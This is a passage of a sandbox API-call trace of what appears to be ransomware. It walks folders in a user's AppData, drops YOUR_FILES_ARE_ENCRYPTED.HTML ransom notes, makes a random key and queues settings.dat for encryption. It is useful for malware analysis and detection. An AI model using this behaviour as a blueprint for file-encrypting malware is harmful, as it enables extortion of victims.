lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\RoamingState" [0115.141] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\RoamingState\\*" [0115.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.141] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 1 [0115.141] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 0 [0115.142] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.142] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0115.142] GetProcessHeap () returned 0x600000 [0115.142] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.143] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.144] CloseHandle (hObject=0x324) returned 1 [0115.144] GetProcessHeap () returned 0x600000 [0115.144] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.144] GetProcessHeap () returned 0x600000 [0115.144] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.145] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30ad260f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0115.145] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.145] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings") returned 93 [0115.145] GetProcessHeap () returned 0x600000 [0115.145] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.146] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings" [0115.146] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\*" [0115.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30ad260f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.146] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30ad260f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 1 [0115.147] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30ad260f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0115.147] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.147] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 106 [0115.147] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.147] lstrlenW (lpString=".lock") returned 5 [0115.147] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.147] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0115.147] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.147] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\settings.dat") returned 106 [0115.147] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.147] lstrlenW (lpString=".dat") returned 4 [0115.147] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.147] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0115.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0115.148] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0115.148] GetProcessHeap () returned 0x600000 [0115.148] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0115.150] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="11") returned 2 [0115.150] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="7A") returned 2 [0115.150] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="E8") returned 2 [0115.150] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="D8") returned 2 [0115.150] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="CD") returned 2 [0115.150] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="86") returned 2 [0115.150] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="9F") returned 2 [0115.150] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="FB") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="41") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="1B") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="A5") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="BE") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="5F") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="E8") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="68") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="F1") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="D5") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="8F") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="16") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="53") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="82") returned 2 [0115.151] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="2B") returned 2 [0115.151] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="A8") returned 2 [0115.151] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="80") returned 2 [0115.151] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="54") returned 2 [0115.151] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="B4") returned 2 [0115.151] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="B0") returned 2 [0115.151] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="23") returned 2 [0115.151] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="7E") returned 2 [0115.152] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="0A") returned 2 [0115.152] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="70") returned 2 [0115.152] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="0C") returned 2 [0115.153] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\settings.dat" [0115.153] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.154] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0115.154] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0115.154] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.154] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0115.154] GetProcessHeap () returned 0x600000 [0115.154] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.155] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.156] CloseHandle (hObject=0x324) returned 1 [0115.156] GetProcessHeap () returned 0x600000 [0115.157] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.157] GetProcessHeap () returned 0x600000 [0115.157] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.158] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30ad260f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0115.158] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.158] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\SystemAppData") returned 98 [0115.158] GetProcessHeap () returned 0x600000 [0115.158] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.159] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\SystemAppData" [0115.159] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\SystemAppData\\*" [0115.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30ad260f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.159] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30ad260f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 1 [0115.159] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30ad260f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30ad260f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30ad260f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 0 [0115.159] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.160] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0115.160] GetProcessHeap () returned 0x600000 [0115.160] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.161] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.162] CloseHandle (hObject=0x324) returned 1 [0115.163] GetProcessHeap () returned 0x600000 [0115.163] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.163] GetProcessHeap () returned 0x600000 [0115.163] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.164] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0115.164] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.164] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\TempState") returned 94 [0115.164] GetProcessHeap () returned 0x600000 [0115.164] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.170] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\TempState" [0115.170] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\TempState\\*" [0115.170] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.170] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 1 [0115.172] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 0 [0115.172] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.172] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.172] GetProcessHeap () returned 0x600000 [0115.172] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, 